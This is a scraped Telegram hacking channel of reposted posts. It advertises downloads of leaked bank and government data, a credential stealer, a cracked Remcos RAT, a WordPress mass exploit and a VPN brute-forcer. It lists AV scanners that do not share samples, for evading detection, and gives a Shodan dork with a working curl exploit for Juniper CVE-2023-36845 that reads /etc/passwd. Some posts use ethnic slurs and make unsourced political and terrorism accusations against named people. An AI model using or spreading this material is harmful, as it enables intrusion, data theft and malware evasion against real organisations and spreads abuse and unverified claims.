๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป - ๐๐๐ฆ๐๐๐ฆ
๐ง๐ผ๐ฝ๐ถ๐ฐ๐ ๐๐ผ๐๐ฒ๐ฟ๐ฒ๐ฑ:
๐ญ. What is SQL?
๐ฎ. Explain Practically how SQL Works ๐
๐ฏ. What is SQL Injection?
๐ฐ. Practicing Basic SQL Injection.
๐๐๐จ๐ค๐ช๐ง๐๐๐จ ๐๐ง๐ ๐๐๐๐๐ ๐๐ฃ ๐ฉ๐๐ ๐ฟ๐๐จ๐๐ง๐๐ฅ๐ฉ๐๐ค๐ฃ, ๐จ๐ค ๐ฎ๐ค๐ช ๐๐๐ฃ ๐๐๐๐๐จ๐จ ๐๐ฉ.
Please Like & Subscribe to our YouTube channel for More info about ๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป. ๐๐ป
๐๐ถ๐ป๐ธ:
https://youtu.be/WYQUO8LMDmY?si=u_PN82qLDKnGXGr-
๐ง๐ผ๐ฝ๐ถ๐ฐ๐ ๐๐ผ๐๐ฒ๐ฟ๐ฒ๐ฑ:
๐ญ. What is SQL?
๐ฎ. Explain Practically how SQL Works ๐
๐ฏ. What is SQL Injection?
๐ฐ. Practicing Basic SQL Injection.
๐๐๐จ๐ค๐ช๐ง๐๐๐จ ๐๐ง๐ ๐๐๐๐๐ ๐๐ฃ ๐ฉ๐๐ ๐ฟ๐๐จ๐๐ง๐๐ฅ๐ฉ๐๐ค๐ฃ, ๐จ๐ค ๐ฎ๐ค๐ช ๐๐๐ฃ ๐๐๐๐๐จ๐จ ๐๐ฉ.
Please Like & Subscribe to our YouTube channel for More info about ๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป. ๐๐ป
๐๐ถ๐ป๐ธ:
https://youtu.be/WYQUO8LMDmY?si=u_PN82qLDKnGXGr-
YouTube
25 SQL Injection - Basic
๐๐น๐๐๐ค๐๐ง๐๐๐: https://drive.google.com/drive/folders/1xoUUDsvwZHStU9me_rQC7GvJejY5hVBH?usp=sharing
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkediโฆ
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkediโฆ
๐งฎActMobile Networks Data Leak : Download
๐ฒInvicta Stealer: A Powerful, Native Stealer : Download
๐GoTTY โ Share Your Terminal As A Web Application : Explore
๐พJPGtoMalware : Try
๐Heart Sender V4.00.33 Crack : Download
@Crackcodes | Crackcodes.in | System32.ink
๐ฒInvicta Stealer: A Powerful, Native Stealer : Download
๐GoTTY โ Share Your Terminal As A Web Application : Explore
๐พJPGtoMalware : Try
๐Heart Sender V4.00.33 Crack : Download
@Crackcodes | Crackcodes.in | System32.ink
๐3๐1
CrackCodes ๐ฎ๐ณ pinned ยซ๐งฎActMobile Networks Data Leak : Download ๐ฒInvicta Stealer: A Powerful, Native Stealer : Download ๐GoTTY โ Share Your Terminal As A Web Application : Explore ๐พJPGtoMalware : Try ๐Heart Sender V4.00.33 Crack : Download @Crackcodes | Crackcodes.in | System32.inkยป
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
๐ด USEFUL WEBSITES FOR PENTESTERS & HACKERS โ
Exploits Database ๐
http://www.exploit-db.com/
http://www.intelligentexploit.com
http://www.shodanhq.com/
http://packetstormsecurity.com/
Vulnerabilities Database ๐น
https://cve.mitre.org/cve/
http://www.cvedetails.com/
https://nvd.nist.gov/
http://osvdb.org/
https://www.kb.cert.org/vuls/
https://secunia.com/community/advisories/search/
http://www.securityfocus.com/bid
http://lwn.net/Vulnerabilities/
http://denimgroup.com/resources-threadfix/
http://www.vulnerability-lab.com
http://www.secdocs.org/
Hacking Tutorials ๐ป
https://www.offensive-security.com/
http://www.kalitutorials.net/2013/08/kali-linux.html
https://www.youtube.com/user/DEFCONConference
https://www.youtube.com/user/Hak5Darren
https://www.youtube.com/user/sansinstitute
https://en.wikibooks.org/wiki/Metasploit/VideoTutorials
http://www.hacking-tutorial.com/
http://breakthesecurity.cysecurity.org/
http://www.securitytube.net/
http://www.ehacking.net/
https://vimeo.com/channels/fullscopesecurity
http://www.spacerogue.net/wordpress/
Virus Scan ๐โ๐จ
https://www.virustotal.com/nl/
http://anubis.iseclab.org/
http://virusscan.jotti.org/it
--Not distribute to AV--
http://v2.scan.majyx.net/?page=home
http://fuckingscan.me/
https://anonscanner.com/
http://nodistribute.com/
http://www.file2scan.net/
Tools Download ๐
http://tools.kali.org/tools-listing
http://insecure.org/
http://www.hackersonlineclub.com/hacking-tools
https://www.concise-courses.com/hacking-tools/
http://www.darknet.org.uk/category/hacking-tools/
http://www.kitploit.com/
http://www.toolswatch.org/
http://www.blackarch.org/tools.html
https://pentest-tools.com/reconnaissance/google-hacking
https://gexos.github.io/Hacking-Tools-Repository/
http://www.romhacking.net/utilities/
Network Online Tools ๐
http://www.yougetsignal.com/
http://www.dnswatch.info/
http://www.nirsoft.net/countryip/
http://www.tcpiputils.com/
http://www.coffer.com/mac_find/
http://bgp.he.net/
http://www.sockets.com/services.htm
http://services.ce3c.be/ciprg/
IP Lookup ๐
http://ip-api.com/#
http://www.my-ip-neighbors.com/
http://www.whatismyip.com/
http://www.ip2location.com/demo
http://freegeoip.net/static/index.html
http://whatstheirip.com
http://ipaddress.com
http://www.ip-adress.com/ipaddresstolocation/
Encrypt / Decrypt โ๏ธ
http://crypo.in.ua/tools/
http://www.tools4noobs.com/online_tools/decrypt/
http://codebeautify.org/encrypt-decrypt
http://textmechanic.com/Encryption-Generator.html
http://www.yellowpipe.com/yis/tools/encrypter/
Online Hash Crackers ๐ฅ
http://www.hashkiller.co.uk/
http://www.md5online.org/
http://www.cmd5.org/
http://www.md5crack.com/
http://www.netmd5crack.com/cracker/
http://md5decryption.com/
http://md5.rednoize.com/
http://www.md5this.com/index.php
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
https://hdb.insidepro.com/en
https://crackstation.net/
http://www.cloudcracker.net/
https://isc.sans.edu/tools/reversehash.html
http://www.onlinehashcrack.com/ [$]
http://hashcrack.in/en [$]
File Upload ๐
https://mega.co.nz/
https://www.mediafire.com/
https://infotomb.com/m/welcome
http://sharesend.com/
http://www.wss-coding.com/upload
http://zippyshare.com/
http://filetolink.com/
http://ge.tt/
http://largedocument.com/
http://rghost.net/
http://dox.abv.bg/files/share
http://secureupload.eu/
Anonymous Test ๐บ
https://ipleak.net/
https://www.dnsleaktest.com/
https://diafygi.github.io/webrtc-ips/
Torcheck โ
http://5deqglhxcoy3gbx6.onion - Xenobite
http://tmkloc6vhxos3nde.onion
SMS ๐ดโโ ๏ธ
http://receive-sms-now.com/
http://www.receive-sms-online.info/
http://www.receivesmsonline.net/
Fake Identity ๐ก
http://www.fakenamegenerator.com/
https://fakena.me/
http://names.igopaygo.com/people/fake_person
Posted by ๐@TheGodEye๐
Exploits Database ๐
http://www.exploit-db.com/
http://www.intelligentexploit.com
http://www.shodanhq.com/
http://packetstormsecurity.com/
Vulnerabilities Database ๐น
https://cve.mitre.org/cve/
http://www.cvedetails.com/
https://nvd.nist.gov/
http://osvdb.org/
https://www.kb.cert.org/vuls/
https://secunia.com/community/advisories/search/
http://www.securityfocus.com/bid
http://lwn.net/Vulnerabilities/
http://denimgroup.com/resources-threadfix/
http://www.vulnerability-lab.com
http://www.secdocs.org/
Hacking Tutorials ๐ป
https://www.offensive-security.com/
http://www.kalitutorials.net/2013/08/kali-linux.html
https://www.youtube.com/user/DEFCONConference
https://www.youtube.com/user/Hak5Darren
https://www.youtube.com/user/sansinstitute
https://en.wikibooks.org/wiki/Metasploit/VideoTutorials
http://www.hacking-tutorial.com/
http://breakthesecurity.cysecurity.org/
http://www.securitytube.net/
http://www.ehacking.net/
https://vimeo.com/channels/fullscopesecurity
http://www.spacerogue.net/wordpress/
Virus Scan ๐โ๐จ
https://www.virustotal.com/nl/
http://anubis.iseclab.org/
http://virusscan.jotti.org/it
--Not distribute to AV--
http://v2.scan.majyx.net/?page=home
http://fuckingscan.me/
https://anonscanner.com/
http://nodistribute.com/
http://www.file2scan.net/
Tools Download ๐
http://tools.kali.org/tools-listing
http://insecure.org/
http://www.hackersonlineclub.com/hacking-tools
https://www.concise-courses.com/hacking-tools/
http://www.darknet.org.uk/category/hacking-tools/
http://www.kitploit.com/
http://www.toolswatch.org/
http://www.blackarch.org/tools.html
https://pentest-tools.com/reconnaissance/google-hacking
https://gexos.github.io/Hacking-Tools-Repository/
http://www.romhacking.net/utilities/
Network Online Tools ๐
http://www.yougetsignal.com/
http://www.dnswatch.info/
http://www.nirsoft.net/countryip/
http://www.tcpiputils.com/
http://www.coffer.com/mac_find/
http://bgp.he.net/
http://www.sockets.com/services.htm
http://services.ce3c.be/ciprg/
IP Lookup ๐
http://ip-api.com/#
http://www.my-ip-neighbors.com/
http://www.whatismyip.com/
http://www.ip2location.com/demo
http://freegeoip.net/static/index.html
http://whatstheirip.com
http://ipaddress.com
http://www.ip-adress.com/ipaddresstolocation/
Encrypt / Decrypt โ๏ธ
http://crypo.in.ua/tools/
http://www.tools4noobs.com/online_tools/decrypt/
http://codebeautify.org/encrypt-decrypt
http://textmechanic.com/Encryption-Generator.html
http://www.yellowpipe.com/yis/tools/encrypter/
Online Hash Crackers ๐ฅ
http://www.hashkiller.co.uk/
http://www.md5online.org/
http://www.cmd5.org/
http://www.md5crack.com/
http://www.netmd5crack.com/cracker/
http://md5decryption.com/
http://md5.rednoize.com/
http://www.md5this.com/index.php
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
https://hdb.insidepro.com/en
https://crackstation.net/
http://www.cloudcracker.net/
https://isc.sans.edu/tools/reversehash.html
http://www.onlinehashcrack.com/ [$]
http://hashcrack.in/en [$]
File Upload ๐
https://mega.co.nz/
https://www.mediafire.com/
https://infotomb.com/m/welcome
http://sharesend.com/
http://www.wss-coding.com/upload
http://zippyshare.com/
http://filetolink.com/
http://ge.tt/
http://largedocument.com/
http://rghost.net/
http://dox.abv.bg/files/share
http://secureupload.eu/
Anonymous Test ๐บ
https://ipleak.net/
https://www.dnsleaktest.com/
https://diafygi.github.io/webrtc-ips/
Torcheck โ
http://5deqglhxcoy3gbx6.onion - Xenobite
http://tmkloc6vhxos3nde.onion
SMS ๐ดโโ ๏ธ
http://receive-sms-now.com/
http://www.receive-sms-online.info/
http://www.receivesmsonline.net/
Fake Identity ๐ก
http://www.fakenamegenerator.com/
https://fakena.me/
http://names.igopaygo.com/people/fake_person
Posted by ๐@TheGodEye๐
Exploit-Db
OffSecโs Exploit Database Archive
The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
๐ฅ2๐1
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Shell ๐
๐น Goshell
๐https://github.com/eze-kiel/goshell
๐นPrint-My-Shell
๐https://github.com/sameera-madushan/Print-My-Shell
๐นReverse-shell-generator
๐https://github.com/0dayCTF/reverse-shell-generator
๐นGirsh
๐https://github.com/nodauf/Girsh
๐น Blueshell
๐https://github.com/whitehatnote/BlueShell
๐นClink
๐http://mridgers.github.io/clink/
๐นNatpass
๐https://github.com/jkstack/natpass
๐นPlatypus
๐https://github.com/WangYihang/Platypus
๐นshells
๐https://github.com/4ndr34z/shells/
๐นReverse_ssh
๐https://github.com/NHAS/reverse_ssh
๐นHoaxshell
๐https://github.com/t3l3machus/hoaxshell
๐น Goshell
๐https://github.com/eze-kiel/goshell
๐นPrint-My-Shell
๐https://github.com/sameera-madushan/Print-My-Shell
๐นReverse-shell-generator
๐https://github.com/0dayCTF/reverse-shell-generator
๐นGirsh
๐https://github.com/nodauf/Girsh
๐น Blueshell
๐https://github.com/whitehatnote/BlueShell
๐นClink
๐http://mridgers.github.io/clink/
๐นNatpass
๐https://github.com/jkstack/natpass
๐นPlatypus
๐https://github.com/WangYihang/Platypus
๐นshells
๐https://github.com/4ndr34z/shells/
๐นReverse_ssh
๐https://github.com/NHAS/reverse_ssh
๐นHoaxshell
๐https://github.com/t3l3machus/hoaxshell
GitHub
GitHub - eze-kiel/goshell: Generate reverse shells in command line with Go !
Generate reverse shells in command line with Go ! Contribute to eze-kiel/goshell development by creating an account on GitHub.
CDI TEAM ON WHATSAP CHANNEL
IN THIS CHANNEL WE WILL PROVIDE YOU GUYS
๐๐ป CODING TUTORIALS AND HACKING TUTORIALS
๐๐ป WEBINARS
๐๐ป GIVEAWAYS AND TIPS AND TRICKS
๐๐ป HANDWRITTEN NOTES
AND MANY MORE STUFF...
LINK : https://whatsapp.com/channel/0029Va9JObd7j6gBzbQybW3r
DON'T FORGET TO SHARE IT WITH YOUR FRIENDS
โค๏ธ JAY SHREE RAAM โค๏ธ
IN THIS CHANNEL WE WILL PROVIDE YOU GUYS
๐๐ป CODING TUTORIALS AND HACKING TUTORIALS
๐๐ป WEBINARS
๐๐ป GIVEAWAYS AND TIPS AND TRICKS
๐๐ป HANDWRITTEN NOTES
AND MANY MORE STUFF...
LINK : https://whatsapp.com/channel/0029Va9JObd7j6gBzbQybW3r
DON'T FORGET TO SHARE IT WITH YOUR FRIENDS
โค๏ธ JAY SHREE RAAM โค๏ธ
๐1
This media is not supported in your browser
VIEW IN TELEGRAM
"Today Bharat has reached the Moon, the G20 meeting is being held in Bharat, and Pakistan is begging countries around the world for a billion dollars"
- Riyasat-e-Madina Pakistan's ex PM Nawaz Sharif.
- Riyasat-e-Madina Pakistan's ex PM Nawaz Sharif.
๐คฃ13๐ค1
๐งฎActMobile Networks Data Leak : Download
๐ฒInvicta Stealer: A Powerful, Native Stealer : Download
๐GoTTY โ Share Your Terminal As A Web Application : Explore
๐พJPGtoMalware : Try
๐Heart Sender V4.00.33 Crack : Download
@Crackcodes | Crackcodes.in | System32.ink
๐ฒInvicta Stealer: A Powerful, Native Stealer : Download
๐GoTTY โ Share Your Terminal As A Web Application : Explore
๐พJPGtoMalware : Try
๐Heart Sender V4.00.33 Crack : Download
@Crackcodes | Crackcodes.in | System32.ink
๐ฉNational Bank of Porkistan Data Leak : Download
๐ทNational Assembly of Porkistan Data Leak : Download
๐ฒOschad Bank of Ukraine Data Leak : Download
๐ธWAF Bypass Tool : Explore
๐Remcos Rat 3.8.0 Cracked (Clean) : Download
๐พCVE-2023-0255 Mass Exploit WordPress < Enable Media Plugin : Download
๐ชฌFortinet Ssl Vpn Bruteforce : Explore
@Crackcodes | System32.ink | Crackcodes.in
๐ทNational Assembly of Porkistan Data Leak : Download
๐ฒOschad Bank of Ukraine Data Leak : Download
๐ธWAF Bypass Tool : Explore
๐Remcos Rat 3.8.0 Cracked (Clean) : Download
๐พCVE-2023-0255 Mass Exploit WordPress < Enable Media Plugin : Download
๐ชฌFortinet Ssl Vpn Bruteforce : Explore
@Crackcodes | System32.ink | Crackcodes.in
๐พ3
Forwarded from ๐๐๐๐๐ก๐ฆ๐ ๐๐๐๐๐๐ฅ
The Pakistani government has advised all sectors to avoid using AI products and services of Indian origin.
The fintech sector, including some banks, in Pakistan has been collaborating with Indian-origin companies that offer IT products, cyber security, and AI solutions.
Two years ago, a US company called Exodus Intelligence claimed that India had used security vulnerabilities to spy on Pakistan and China.
Additionally, in 2020, Pakistani intelligence agencies discovered a significant security breach in which Indian hackers targeted the phones and devices of government officials and military personnel.
The fintech sector, including some banks, in Pakistan has been collaborating with Indian-origin companies that offer IT products, cyber security, and AI solutions.
Two years ago, a US company called Exodus Intelligence claimed that India had used security vulnerabilities to spy on Pakistan and China.
Additionally, in 2020, Pakistani intelligence agencies discovered a significant security breach in which Indian hackers targeted the phones and devices of government officials and military personnel.
๐7
๐ Exciting News! Introducing NeplixFile ๐
Tired of endless searches for files? NeplixFile is here to save the day! ๐
๐ NeplixFile - Your Ultimate File Search Engine ๐๐ฅ
Say goodbye to endless searching and hello to effortless access! NeplixFile is your go-to solution for finding files like courses, ebooks, movies, and more in a snap. ๐
โจ Key Features:
๐ Lightning-fast search capabilities
๐ Access to a treasure trove of resources
๐ Completely FREE!
Experience the power of NeplixFile today! ๐ Visit https://file.neplix.stream and simplify your file-finding journey. ๐
Tired of endless searches for files? NeplixFile is here to save the day! ๐
๐ NeplixFile - Your Ultimate File Search Engine ๐๐ฅ
Say goodbye to endless searching and hello to effortless access! NeplixFile is your go-to solution for finding files like courses, ebooks, movies, and more in a snap. ๐
โจ Key Features:
๐ Lightning-fast search capabilities
๐ Access to a treasure trove of resources
๐ Completely FREE!
Experience the power of NeplixFile today! ๐ Visit https://file.neplix.stream and simplify your file-finding journey. ๐
Juniper J-Web - Remote Code Execution ๐ฅ - CVE-2023-36845
Nearly 14,000 Juniper devices are affected, as a search on Shodan shows:
Dork : title:"Juniper" http.favicon.hash:2141724739
Poc:
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
Here is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei:
https://lnkd.in/gEQrmXev
For more information:
https://lnkd.in/gRP3uXTm
#hacker_bano_chutiya_nhe
Nearly 14,000 Juniper devices are affected, as a search on Shodan shows:
Dork : title:"Juniper" http.favicon.hash:2141724739
Poc:
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
Here is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei:
https://lnkd.in/gEQrmXev
For more information:
https://lnkd.in/gRP3uXTm
#hacker_bano_chutiya_nhe
โก4
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
List of Cryptography Tools used in CTFs :
Decoder 1: www.dcode.fr/
symbols-ciphers
Decoder 2: cryptii.com
Dedcoder 3: gchq.github.io/CyberChef
Decoder 4: crackstation.net
Rot Decoder: theblob.org/rot.cgi
Twin Hex: www.calcresult.com/misc/cyphers/twin-hex.html
Decoder 1: www.dcode.fr/
symbols-ciphers
Decoder 2: cryptii.com
Dedcoder 3: gchq.github.io/CyberChef
Decoder 4: crackstation.net
Rot Decoder: theblob.org/rot.cgi
Twin Hex: www.calcresult.com/misc/cyphers/twin-hex.html
๐ฅ2
CrackCodes ๐ฎ๐ณ pinned ยซ๐ฉNational Bank of Porkistan Data Leak : Download ๐ทNational Assembly of Porkistan Data Leak : Download ๐ฒOschad Bank of Ukraine Data Leak : Download ๐ธWAF Bypass Tool : Explore ๐Remcos Rat 3.8.0 Cracked (Clean) : Download ๐พCVE-2023-0255 Mass Exploit WordPressโฆยป
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Media is too big
VIEW IN TELEGRAM
๐ฆ๐ฟGoogle Dorks For Penetration Testing๐ฆ๐ฟ
๐บHow is Google dorking used by hackers?
:-Hacker utilize Google Dorks to uncover exposed data for example log files with usernames and passwords or cameras, etc.
๐บHow is Google dorking used by hackers?
:-Hacker utilize Google Dorks to uncover exposed data for example log files with usernames and passwords or cameras, etc.
โค3
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
โ
Watch Free Netflix Trick Working || 2023 Smoothly โ
โค๏ธ View -: https://netflixmirror.com
Its Paid But Now Free!!
Give Some Reaction ๐ฏ
โค๏ธ View -: https://netflixmirror.com
Its Paid But Now Free!!
Give Some Reaction ๐ฏ
๐3๐1๐1
After Kashmir, mole found in Kerala
A police officer in Kerala has connections to terrorists; SI Rijumon, a cyber cell officer, leaked highly confidential information to terrorists linked to ISIS!
ISIS terrorists are becoming more active in Kerala. It has been reported that SI Rijumon from the cyber cell has been suspended for links to terrorism in Kottayam.
The suspension occurred after the NIA discovered that he had shared confidential information with terrorist organizations. The terrorists who were recently arrested in Chennai were found to have ties to Rijumon. As a result, the NIA instructed the Kerala Police to suspend him promptly.
This is not the first time that infiltration of the PFI in the Kerala police force has come to the fore. Many years ago, intelligence reports suggested radicalization and pointed to a WhatsApp group of police officers called the Pacha Velicham (Green Light). It is suspected that sections of the Communist regime also use this group to carry out the party agenda
A police officer in Kerala has connections to terrorists; SI Rijumon, a cyber cell officer, leaked highly confidential information to terrorists linked to ISIS!
ISIS terrorists are becoming more active in Kerala. It has been reported that SI Rijumon from the cyber cell has been suspended for links to terrorism in Kottayam.
The suspension occurred after the NIA discovered that he had shared confidential information with terrorist organizations. The terrorists who were recently arrested in Chennai were found to have ties to Rijumon. As a result, the NIA instructed the Kerala Police to suspend him promptly.
This is not the first time that infiltration of the PFI in the Kerala police force has come to the fore. Many years ago, intelligence reports suggested radicalization and pointed to a WhatsApp group of police officers called the Pacha Velicham (Green Light). It is suspected that sections of the Communist regime also use this group to carry out the party agenda
โค1๐1๐1